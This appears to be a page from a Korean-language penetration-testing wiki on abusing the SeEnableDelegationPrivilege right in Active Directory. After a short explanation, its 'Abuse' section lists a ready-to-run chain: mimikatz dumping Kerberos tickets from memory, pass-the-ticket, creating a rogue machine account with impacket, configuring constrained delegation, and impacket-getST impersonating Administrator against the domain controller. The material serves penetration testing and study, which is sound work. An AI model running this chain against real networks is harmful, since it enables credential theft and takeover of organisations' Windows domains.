펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Tickets
      • Diamond Tickets
      • DC Shadow
      • RID Hijacking
      • Certificate
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • GenericAll
        • Inherited GenericAll
        • WriteOwner
        • GenericWrite
        • WriteProperty
        • WriteSPN
        • AddMembers
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
        • Restore-ADObject
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Tickets
      • KrbRelayUp
      • GPO
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • Kerberoasting
      • Timeroasting
      • Targeted Kerberoast
      • ASRep-Roasting
      • AS Requested Service Tickets
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • Resource Based Constrained Delegation
      • Shadow Credentials
      • DCSync
      • LSASS
      • Backup Operators
      • SeEnableDelegationPrivilege
      • Domain Cached Credentials
      • Network Access Account Credentials
      • DPAPI Backup Key
    • Windows
      • Unattended File
      • DPAPI
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Pivoting
      • SOCKS
      • Proxifier
      • Remote Port Forwarding
    • NTLM Relay
    • WebDAV Relay
    • WinRM
    • PsExec
    • WMI
    • DCOM
    • RDP
    • Port Forwarding
    • Domain Trust Discovery
  • 사용자 가장
    • Pass the Hash
  • Pass the Ticket
  • Overpass the Hash
  • Token Impersonation
  • Make Token
  • Process Injection
  • Domain Trust
    • Active Directory Trusts
    • Two-way Domain Trust
    • One-way Domain Trust
  • ETC
    • CS
      • Active Directory
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Delegation
      • OAuth 2.0
      • S4U
      • SCCM
      • SID History
      • TRUSTWORTHY
      • Link Server Passwords
      • SSL Pinning
    • Tools
      • Mindmap
      • Cobalt Strike
      • BloodHound
      • LDAP Search
      • Hydra
      • Hashcat
      • Ligolo-ng
    • Home Lab
Powered by GitBook
On this page
  • Abuse
  • References

Was this helpful?

Export as PDF
  1. 민감정보 탈취
  2. Active Directory

SeEnableDelegationPrivilege

PreviousBackup OperatorsNextDomain Cached Credentials

Last updated 1 month ago

Was this helpful?

SeEnableDelegationPrivilege 권한이 있으면 도메인 객체에 대해 Trusted For Delegation 설정을 할 수 있습니다.장악을 한 머신 계정이 이 설정이 되어있어서 신뢰받는 계정이라면 S4U2self를 이용하여 티켓 대행 발급을 사용할 확률이 높습니다. 신뢰받는 계정을 통해서 티켓을 발급할 경우 계정의 메모리에는 TGT 정보가 남게 되어 메모리 덤프를 통해 다른 사용자의 TGT를 획득하고, NT Hash를 탈취할 수 있습니다.

모든 도메인 사용자를 가장할 수 있는 것은 아니며 사용자의 userAccountControl 속성에서 ACCOUNT_NOT_DELEGATED 설정이 있다면 BloodHound에서는 Cannot be delegated라고 나오며 가장이 불가능합니다. SeEnableDelegationPrivilege 권한을 가진 사용자가 1개의 머신 계정에 대해서 GenericAll 권한을 가지고 있다면 해당 머신 계정의 userAccountControl 속성을 변경하여 머신 계정을 이용한 서비스 가장 이용을 통해 ST를 발급할 수 있습니다.

Abuse

# 도메인 내에 Unconstrained Delegation이 할당된 객체가 있는지 확인
PowerShell > Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# 도메인 내에 Constrained Delegation이 할당된 객체가 있는지 확인
PowerShell > Get-ADComputer -Filter * -Properties "msDS-AllowedToDelegateTo" | Where-Object { $_."msDS-AllowedToDelegateTo" -ne $null } | Select-Object Name, "msDS-AllowedToDelegateTo"

# 메모리에 저장된 TGT 내보내기
mimikatz > sekurlsa::tickets /export

# 티켓 내보내기
mimikatz > kerberos::ptt C:\Windows\Temp\<Exported Ticket>

# 티켓을 사용하여 도메인 컨트롤러 쉘 획득
PowerShell > Enter-PSSession <Domain Controller>
# 새로운 머신 계정 생성
Kali > impacket-addcomputer -computer-name 'WIKI$' -computer-pass 'Password123!' -dc-host 10.0.2.10 -domain-netbios pentesting.wiki pentesting.wiki/wiki:password123!

# WIKI 계정의 Constrained Delegation 속성에 cifs SPN 추가
PowerShell > Set-ADComputer -Identity WIKI -Add @{'msDS-AllowedToDelegateTo'=@('cifs/DC01.PENTESTING.WIKI')}

# WIKI 계정에 Trusted For Delegation를 추가하여 위임 권한 등록
PowerShell > Set-ADAccountControl -Identity "WIKI$" -TrustedToAuthForDelegation $True

# 등록된 Delegation 목록 확인 :: Powershell
PowerShell > Get-ADComputer -Filter * -Properties msDS-AllowedToDelegateTo | Where-Object { $_.'msDS-AllowedToDelegateTo' -ne $null } | Select-Object Name, msDS-AllowedToDelegateTo

# 등록된 Delegation 목록 확인 :: Kali Linux
Kali > impacket-findDelegation pentesting.wiki/<USER:PASS> -dc-ip 10.0.2.10

# 도메인 사용자를 가장하여 티켓 발급
kali > impacket-getST -spn 'cifs/DC01.PENTESTING.WIKI -impersonate Administrator pentesting.wiki/WIKI:Password123!

References

Attacking Kerberos Unconstrained DelegationMedium
Kerberos Unconstrained DelegationRed Teaming Experiments
Logo
Logo